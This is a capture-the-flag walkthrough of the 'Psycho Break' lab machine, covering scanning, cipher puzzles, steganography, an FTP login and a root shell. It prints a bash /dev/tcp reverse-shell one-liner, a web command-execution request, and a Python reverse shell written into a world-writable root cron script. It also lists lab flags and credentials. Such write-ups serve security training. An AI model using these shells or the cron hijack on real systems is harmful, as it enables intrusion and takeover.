The Psycho Break machine is fairly easy but has a few twists.
Let’s start by scanning the Psycho Break machine with Nmap:
nmap -sC -sV Machine_IP
which gives us the following output:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-11 05:08 EDT
Nmap scan report for 10.10.154.17
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.35 seconds
- an SSH service on port 22, OpenSSH 7.2p2.
But when we answer that only one port is open, the room marks it as wrong, which means there are other ports up and running, so let’s run an Nmap scan on all ports of the Psycho Break machine:
nmap -sC -sV Machine_IP -p-
You should get the following results:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-14 03:25 EDT
Nmap scan report for 10.10.165.93
Host is up (0.28s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1332.47 seconds
- an FTP service on port 21 (ProFTPD 1.3.5a), but anonymous login is not enabled.
So let’s open the machine in our browser; you should get the following page.
Nothing much, so let’s open the page source to see if there is any important information.
We have a comment talking about a room, /sadistRoom, and an <a> tag that refers to map.html, but that one gives a 404 when you try to access it.
Let’s open /sadistRoom; you should get the following site.
Well, we have the first key: if you click on “here”, you should get a popup with the first flag
532219a04ab7a02b56faafbec1a4c1ea
But after you close the popup, the screen will change to
and in a few seconds you will get the following page,
which means there is JavaScript running that changes the page, so let’s open the page source to see what is happening in the back.
You will see a script.js file; when opened, you will get the following script.
// script.js as served by /sadistRoom: the "here" link shows the first key,
// then starts the scripted "Sadist" sequence.
$(".keypressed").click(function(e) {
    e.preventDefault();
    alert("Key to locker Room => 532219a04ab7a02b56faafbec1a4c1ea");
    setTimeout(function() {
        herecomesSadist();
    }, 1500);
});

function herecomesSadist() {
    // Phase 1: black background, warning text and the red "escape" button
    $("body").css("background-color", "#000");
    $(".para").text("Escape to locker Room before its too late !!!");
    $(".para").addClass("danger");
    $(".center-wrapper").css("display", "none");
    $(".imgsource").attr('src', 'EscapingSadist.jpg');
    $(".imgsource").css('height', '300px');
    $(".imgsource").css('width', '500px');
    $(".center-wrapper").css("display", "flex");
    $(".btn-danger").css("display", "flex");
    $(".btn-danger").css("background-color", "#f50000");
    $(".btn-danger").css("color", "#000");
    // Phase 2, six seconds later: the "too late" screen, button hidden again
    setTimeout(function() {
        $("body").css("background-color", "#f50000");
        $(".imgsource").attr('src', 'SadistShred.gif');
        $(".center-wrapper").css("display", "flex");
        $(".para").text("Too Late Sebastian is dead !!!");
        $(".para").css('color', '#000');
        $(".para").css('text-align', 'center');
        $(".para").css('font-size', '25px');
        $(".btn-danger").css("display", "none");
    }, 6000);
}

// The escape button asks for the key and, if it matches, navigates to ../lockerRoom/
$(".btn-danger").click(function(e) {
    const key = prompt("Enter Key To The Locker Room ");
    if (key == "532219a04ab7a02b56faafbec1a4c1ea") {
        window.open("../lockerRoom/", "_self");
    }
});
We can see our flag in the script, along with the changes that happen on the page in the herecomesSadist function, and at the end a new page, “lockerRoom”, so let’s open that page.
And we get a new page,
with a text that needs to be decoded:
Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv
along with a link to a map, which is a page with an input field.
So let’s start by decoding the message; first, let’s try the ROT method with different rotation values.
You can try this site to see all the possible ROT values, but none of them makes sense, so let’s try a different decoding algorithm.
After some research, it turns out the text is encoded with the Atbash cipher (each letter is replaced by its mirror in the alphabet: a↔z, b↔y, and so on); decoding it gives the following text, which is our 2nd flag.
Grant_me_access_to_the_map_please
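As an added example (not code from the original post or the room), here is the same decoding done locally instead of on a website: a ROT-N brute force of the kind the online tool lists, and an Atbash decoder, which is its own inverse. The ciphertext constant is the lockerRoom string quoted above; the rot47 helper is included because the same family of printable-ASCII rotations comes up with the .readThis.txt note later in the post.

```python
# Added example (not from the original post): generic single-alphabet
# decoders for the two schemes discussed above, ROT-N (tried first) and
# Atbash (the one that actually works on the lockerRoom string).
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def rot_n(text, n):
    """Shift every ASCII letter by n positions; non-letters pass through."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + n) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + n) % 26])
        else:
            out.append(ch)
    return "".join(out)


def rot_bruteforce(text):
    """All 25 non-trivial rotations, the way the online ROT tool lists them."""
    return {n: rot_n(text, n) for n in range(1, 26)}


def atbash(text):
    """Mirror the alphabet (a<->z, b<->y, ...). Atbash is its own inverse."""
    table = str.maketrans(LOWER + UPPER, LOWER[::-1] + UPPER[::-1])
    return text.translate(table)


def rot47(text):
    """ROT47 rotates the 94 printable ASCII characters 0x21..0x7E by 47."""
    return "".join(
        chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
        for c in text
    )


# Ciphertext taken from the lockerRoom page in the post.
CIPHERTEXT = "Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv"

if __name__ == "__main__":
    for n, candidate in rot_bruteforce(CIPHERTEXT).items():
        print(f"ROT{n:2d}: {candidate}")
    print("Atbash:", atbash(CIPHERTEXT))
```

Running it prints 25 rotations that are all gibberish and then the Atbash line, which is the only readable one. Because Atbash is an involution, atbash(atbash(x)) == x, so the same function encodes and decodes.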
After we enter the key on the map.php page, we will get the following pages:
- /sadistRoom/ (we already know it)
- /lockerRoom/(we already know it)
- /SafeHeaven/
- /abandonedRoom/
Let’s start with the SafeHeaven room.
There’s nothing much at first sight, so let’s look at the page source.
We will find a hint as an HTML comment:
<!-- I think I'm having a terrible nightmare. Search through me and find it ... -->
This hint says that something is hidden, so it could be one of these options:
- the page’s code (CSS or JavaScript)
- a hidden page under the SafeHeaven directory
- the images above, as steganography
You can check the CSS and JavaScript files, but nothing useful is there: normal CSS along with jQuery and Lightbox (used to display the images).
Let’s go for the second option and scan for hidden directories with the GoBuster tool; let it run for around 10-15 minutes:
gobuster dir --url http://Machine_IP/SafeHeaven -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
You should get the following directories:
/imgs (Status: 301)
/keeper (Status: 301)
The first one holds the images we saw on the page, so we will skip it.
Let’s access the second link; you should get this page,
and if you click on Escape Keeper, it takes you to a page asking you to identify a specific location from an image:
http://Machine_IP/SafeHeaven/keeper/escapefromkeeper.php
We need to identify the following location; a simple Google reverse image search gives us the answer:
St. Augustine Lighthouse
and we get our next flag:
48ee41458eb0b43bf82b986cecf3af01
Let’s take the flag and put it in the /abandonedRoom page; you will be redirected to the following page:
http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/index.php
If you click on Go Further, you will be redirected to the following page:
http://10.10.57.176/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php
There’s nothing much on this page, so let’s look at the source code. We get a new hint:
<!-- There is something called "shell" on current page maybe that'll help you to get out of here !!!-->
So this means there should be a way to access a shell on the server. The word shell is written between quotes, which is usually a hint for a parameter name on the page.
This parameter can be sent with different HTTP methods, but let’s try a GET request first: we can pass a GET parameter by appending “?shell=” to the URL, and let’s use a harmless command, for example listing the files:
http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php?shell=ls
and you can see that we got the directory listing back.
Now, since we have command execution, we can run commands, and what better command than opening a reverse shell to our machine, where we have more freedom.
We will use the same script we used in the previous article.
bash -i >& /dev/tcp/your_IP/your_port 0>&1
But apparently the command is not allowed, so let’s explore a little. To go up one level and see the parent directory, you can use
cd ..
but apparently the cd command is not allowed at the beginning either. We know that ls worked, so why don’t we just ls the parent directory:
ls ..
and voila! You should get the following files:
- 680e89809965ec41e64dc7e447f175ab
- be8bc662d1e36575a52da40beba38275
- index.php
Now, two of them are obviously hashes or hexadecimal strings (most probably hashes), so let’s search online to see what they mean.
Before looking up the hashes: since these are on a web server, each one is a page, and the second hash is the current page’s directory.
If you remember, our page is
http://Machine_IP/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php
so let’s access the first hash page:
http://Machine_IP/abandonedRoom/680e89809965ec41e64dc7e447f175ab
We get the following files; let’s download them first.
The next flag is the text file that we got, which contains
you_made_it
Now let’s go to the zip file; first, let’s extract the files inside.
We get a text file and an image; the text file has the following hint:
Who ever sees this message "HELP Me". Ruvik locked me up in this cell. Get the key on the table and unlock this cell. I'll tell you what happened when I am out of
this cell.
Now, if we try to open the image, it seems corrupted because the file starts with 0x50 0x4b (the Kali image viewer shows this), so let’s copy the file and change the header to make it an openable image.
You can change the header with any hex editor you like, but first let’s find out the value of a JPG file header.
You can try any of the JPG headers in this link, but none of them will work, which means this file might not be an image at all.
But what file could it be? This is what the “file” command is for; alternatively, you can search the above link for which extensions start with “50 4b”, and you will get the following list:
- zip
- aar
- apk
- docx
- epub
- ipa
- jar
- kmz
- maff
- odp
- ods
- odt
- pk3
- pk4
- pptx
- usdz
- vsdx
- xlsx
- xpi
Now you can change the file’s extension to each of the above and try them one by one until one works, or you can use the following command:
file Table.jpg
The command tells us this is a Zip file, so let’s change the extension to “zip”.
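To show what the file command is actually doing here, this added example (not from the original post) identifies a file by its leading bytes rather than its extension. The sample "Table.jpg" is a ZIP archive constructed in memory with two placeholder member names; the bytes inside them are made up. It also shows why the list of candidate extensions above is so long: every ZIP-based container (docx, apk, jar, ...) starts with the same PK signature.

```python
# Added example (not from the original post): identify a file by its
# "magic number" instead of trusting its extension, like the `file` command.
import io
import zipfile

# A few common signatures. ZIP-based containers (docx, apk, jar, ...) all
# start with "PK\x03\x04" (0x50 0x4b), hence the long candidate list above.
SIGNATURES = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
    (b"PK\x05\x06", "zip (empty archive)"),
    (b"%PDF-", "pdf"),
    (b"\x7fELF", "elf"),
]


def identify(data):
    """Return the type implied by the first bytes, or 'unknown'."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def identify_file(path):
    """Same check against a file on disk; only the first 16 bytes are read."""
    with open(path, "rb") as fh:
        return identify(fh.read(16))


def build_fake_table_jpg():
    """Constructed sample: a ZIP archive that would be saved as Table.jpg."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Joseph_Oda.jpg", b"\xff\xd8\xff\xe0not-a-real-jpeg")
        zf.writestr("key.wav", b"RIFF....WAVE")
    return buf.getvalue()


def list_members(data):
    """Open the bytes as a ZIP and list the file names inside."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    sample = build_fake_table_jpg()
    print("first bytes:", sample[:4].hex(" "))   # 50 4b 03 04
    print("type:", identify(sample))             # zip, despite the .jpg name
    print("members:", list_members(sample))
```

The same idea works in reverse as a sanity check on uploads or downloads: when the extension says image but the first bytes say archive, treat the file as an archive.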
If you open the zip file, you get an image named “Joseph_Oda” and a sound file, “key.wav”.
Now, if you open the image, there’s really nothing in it, so let’s check the image’s EXIF data:
exiftool Joseph_Oda.jpg
Hmm, nothing in the EXIF data either; maybe a file is hidden with steganography, so let’s use steghide to find out. But before that we need a password, so let’s check the key file.
The audio file gives only beep sounds, which is similar to Morse code, so let’s search online for a “Morse code audio decoder”; you should get this website as the first result.
Let’s upload the file and click on play; it should decode the audio and give you the following message:
SHOWME
Let’s try this message as the password for steghide:
steghide extract -sf Joseph_Oda.jpg
and you should get the success message:
wrote extracted data to "thankyou.txt".
Now let’s open the file; you should get the following text.
The file gives us names along with FTP credentials, so it answers several of the room’s questions at once.
Who is locked up in the cell?
jospeh
The .wav file
SHOWME
FTP Username
joseph
FTP User Password
intotheterror445
So now, let’s access the FTP service on the machine.
We get the following files, so let’s download them:
-rwxr-xr-x 1 joseph joseph 11641688 Aug 13 2020 program
-rw-r--r-- 1 joseph joseph 974 Aug 13 2020 random.dic
One of them is a program and the other is a wordlist; let’s try to run the program:
[+] Usage
./program <word>
So the program takes a word, checks whether it is correct and then, presumably, returns the flag.
Instead of brute-forcing all the words right away, let’s use the “strings” command; maybe we can get the flag, a password or even a hash:
strings program
and you will get a lot of results, so let’s search inside them with the “grep” command, one search term at a time:
strings program | grep -i <word>
I tried to search for the following, but nothing came up, so let’s do the brute-forcing.
- key
- flag
- correct
- valid
- pass
Let’s write a bash script that feeds the program every word in the wordlist.
So first, I wrote the following program:
#!/bin/bash
# Feed every line of the wordlist to ./program as its argument
input="newfile.txt"
while read line
do
    ./program $line
done < "$input"
Simple, right? But it never worked; when I use echo, I can see the line clearly, so why doesn’t the program take it?
I spent some time researching the problem and trying different solutions, such as using xargs, but none of them worked.
So I tried to output all the characters using cat:
cat -A random.dic
and I got the following:
test^M$
testing^M$
trustno1^M$
tweety^M$
welcome^M$
westside^M$
whatever^M$
windows^M$
writer^M$
zxcvbnm^M$
zxczxc^M$
james^M$
As you can see, there are extra characters, so I researched them; they are carriage returns.
The URL mentions many ways to remove them; one of them is dos2unix, where you can run
dos2unix random.dic
then run the same script from before, and it will work like a charm :D
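The failure above is worth seeing in code, so here is an added example (not from the original post) that reproduces what cat -A displayed and what dos2unix fixes. The wordlist bytes are a constructed sample with Windows-style CRLF line endings, like the one served from the FTP share: each line the loop read still carried a trailing carriage return, so the program was comparing "kidman\r", not "kidman".

```python
# Added example (not from the original post): why the loop fed the program the
# wrong words, and the conversion dos2unix applies. WORDLIST is a constructed
# sample with CRLF line endings, as on the box.
def show_nonprinting(line):
    """Render one raw line the way `cat -A` does: CR as ^M, end of line as $."""
    body = line.rstrip(b"\n")
    return body.replace(b"\r", b"^M").decode("ascii", "replace") + "$"


def dos2unix(data):
    """Convert CRLF (and any stray CR) line endings to LF, like dos2unix."""
    return data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")


def words(data):
    """Split a wordlist into clean candidate words, with no CR attached."""
    return [w.decode() for w in dos2unix(data).split(b"\n") if w]


WORDLIST = b"test\r\ntesting\r\ntrustno1\r\nkidman\r\n"  # constructed sample

if __name__ == "__main__":
    for raw in WORDLIST.splitlines(keepends=True):
        print(show_nonprinting(raw))          # e.g. test^M$
    # The program compares the whole argument, so "kidman\r" is not "kidman".
    print(b"kidman\r" == b"kidman", "kidman" in words(WORDLIST))
```

Any tool that reads the file line by line in text mode with universal newlines gets the same cleanup for free; the bash read loop does not, which is why the CR survived all the way into the program's argument.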
While the program is running, you will get the following:
kidman => Correct
Well Done !!!
Decode This => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33
So we got the key.
Now it’s time to decode the message.
The first thing I thought about was converting the numbers to hexadecimal values, which gave the following:
37 1bc 3 6 2 42 1e61 7 2 1e61 1e61 9 29a 309 3 1bc 1e61 1e61 29a 1e61 8 309 2 42 4 21
Then I tried to convert the values to a string, but I got garbage, so the next step was to check for hashing: I tried a hash analyzer tool after removing the whitespace.
It told me it is an Oracle 11 hash, but when I searched for it or tried to crack it I had no success, so I searched for a different type of encoding that uses numbers only.
I searched for it on Google and got this as the first result,
so I tried it, to see whether it is using the T9 encoding method, which was mainly used on phones with a physical keypad.
You can use this image for reference.
So the decoding of the string is the following:
KIDMANSPASSWORDISSOSTRANGE
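As an added example (not code from the original post), here is the keypad decoding done programmatically rather than by hand from the reference image. Each space-separated token is one key pressed repeatedly, and the number of presses selects the letter printed on that key (the multi-tap scheme the post calls T9). MESSAGE is the string the program printed above; the encoder is included so the decode can be checked by round-tripping it.

```python
# Added example (not from the original post): decode multi-tap keypad text.
# Each token is one key pressed k times; the k-th letter on that key is the
# character. The keypad layout is the standard ITU E.161 one.
KEYPAD = {
    "2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
    "6": "MNO", "7": "PQRS", "8": "TUV", "9": "WXYZ", "0": " ",
}


def decode_multitap(message):
    """'55 444 3' -> 'KID'. Raises ValueError on a malformed token."""
    out = []
    for token in message.split():
        key = token[0]
        if key not in KEYPAD or token != key * len(token):
            raise ValueError(f"malformed token {token!r}")
        letters = KEYPAD[key]
        if len(token) > len(letters):
            raise ValueError(f"key {key} has only {len(letters)} letters, got {token!r}")
        out.append(letters[len(token) - 1])
    return "".join(out)


def encode_multitap(text):
    """Inverse transform, handy for confirming a decode round-trips."""
    tokens = []
    for ch in text.upper():
        for key, letters in KEYPAD.items():
            if ch in letters:
                tokens.append(key * (letters.index(ch) + 1))
                break
        else:
            raise ValueError(f"no key for {ch!r}")
    return " ".join(tokens)


# The string printed by ./program once it hit the correct word.
MESSAGE = ("55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 "
           "666 7777 8 777 2 66 4 33")

if __name__ == "__main__":
    print(decode_multitap(MESSAGE))  # KIDMANSPASSWORDISSOSTRANGE
```

Because the scheme has no way to express lowercase, the decoded text is necessarily all capitals, which is why the password has to be entered in caps.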
So we got a new user along with its password; let’s try to log in over SSH with the username kidman and the string we got (the password has to be in caps).
Great, we’re logged in, so let’s list the files and directories:
drwxr-xr-x 4 kidman kidman 4096 Aug 13 2020 .
drwxr-xr-x 5 root root 4096 Jul 13 2020 ..
-rw------- 1 kidman kidman 1 Aug 13 2020 .bash_history
-rw-r--r-- 1 kidman kidman 220 Jul 13 2020 .bash_logout
-rw-r--r-- 1 kidman kidman 3771 Aug 13 2020 .bashrc
drwx------ 2 kidman kidman 4096 Jul 13 2020 .cache
drwxrwxr-x 2 kidman kidman 4096 Jul 13 2020 .nano
-rw-r--r-- 1 kidman kidman 655 Jul 13 2020 .profile
-rw-rw-r-- 1 kidman kidman 264 Aug 13 2020 .readThis.txt
-rw-r--r-- 1 root root 25 May 14 16:22 .the_eye.txt
-rw-rw-r-- 1 kidman kidman 33 Jul 13 2020 user.txt
So many files; let’s start with user.txt. Outputting the file with cat gives us the following string:
4C72A4EF8E6FED69C72B4D58431C4254
Now the next question is to get root access, so we’re looking for privilege escalation, but first let’s output the other text files.
The .readThis.txt file gives us the following:
uC@> z:5>2?i
%96 E9:?8 x 2> 23@FE E@ E6== D@ :D E@A D64C6E] }@ @?6 5@6D?VE <?@H 23@FE E9:D] xEVD E96 #FG:<VD 6J6] }@ @?6 42? 9:56 2H2J 7C@> :E] qFE x 42? E6== J@F @?6 E9:?8 D62C49 7@C E96 DEC:?8 YE9606J60@70CFG:<Y ] *@F 8@E E@ 96=A $632DE:2? 56762E #FG:< ]]]
and .the_eye.txt gives us the following:
No one can hide from me.
I tried to find a decoding for the first file on this website, but I got nothing.
So let’s look for programs our user can run with sudo:
sudo -l
But we got nothing, so let’s check the cron jobs to see what’s being executed:
cat /etc/crontab
and we get the following results:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root python3 /var/.the_eye_of_ruvik.py
One of the jobs runs /var/.the_eye_of_ruvik.py as root every two minutes; let’s go there and check the file. It is world-writable (others have rw-), so we have write permission on it:
-rwxr-xrw- 1 root root 300 Aug 14 2020 .the_eye_of_ruvik.py
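From the defender's side, the weakness here is a root cron job whose script anyone can edit. This added example (not from the original post) is a small audit that parses /etc/crontab-style lines and flags any job whose referenced script is group- or world-writable. It builds its own sample files in a temporary directory, with the same mode bits as the file above, so it runs anywhere; the path-extraction is a heuristic and the file names are constructed.

```python
# Added example (not from the original post): audit a system crontab for jobs
# that execute files writable by someone other than their owner. The sample
# crontab and script files are constructed in a temp directory.
import os
import stat
import tempfile


def parse_crontab(text):
    """Return (user, command) for each job line of a system-wide crontab."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def script_paths(command):
    """Absolute paths mentioned in the command (rough but useful heuristic)."""
    return [tok for tok in command.replace("&&", " ").split() if tok.startswith("/")]


def writable_by_others(path):
    """True if group or world has write permission on an existing path."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(crontab_text):
    """Return (user, path) pairs where a job runs a loosely permissioned file."""
    findings = []
    for user, command in parse_crontab(crontab_text):
        for path in script_paths(command):
            if writable_by_others(path):
                findings.append((user, path))
    return findings


def demo():
    """Create one world-writable and one sane script, then audit a crontab."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, ".the_eye_of_ruvik.py")   # constructed name
        good = os.path.join(tmp, "safe.py")                # constructed name
        for path, mode in ((bad, 0o757), (good, 0o755)):   # 0o757 == -rwxr-xrw-
            with open(path, "w") as fh:
                fh.write("print('hi')\n")
            os.chmod(path, mode)
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            f"*/2 * * * * root python3 {bad}\n"
            f"*/5 * * * * root python3 {good}\n"
        )
        return [os.path.basename(p) for _, p in audit(crontab)]


if __name__ == "__main__":
    print(demo())  # ['.the_eye_of_ruvik.py']
```

A real audit would also walk /etc/cron.d and the per-user crontabs and check the directories on the script's path, since a writable parent directory lets the file be replaced just as easily; the fix on a box like this is chmod 755 on the script and ownership by root.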
So it’s time for a Python reverse shell; we can get the code from GTFOBins:
import sys,socket,os,pty;
s=socket.socket()
s.connect(("machine_ip",port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
After you make the edits, open a nc listener on your machine on the same port and wait for the machine to connect back; the script runs every two minutes, so it might take some time.
Then you can get root.txt:
BA33BDF5B8A3BFC431322F7D13F3361E
As for the bonus task, we need to delete the ruvik user:
userdel -r ruvik
To confirm, you can output the /etc/passwd file, where ruvik will no longer be found.
And this is Psycho Break.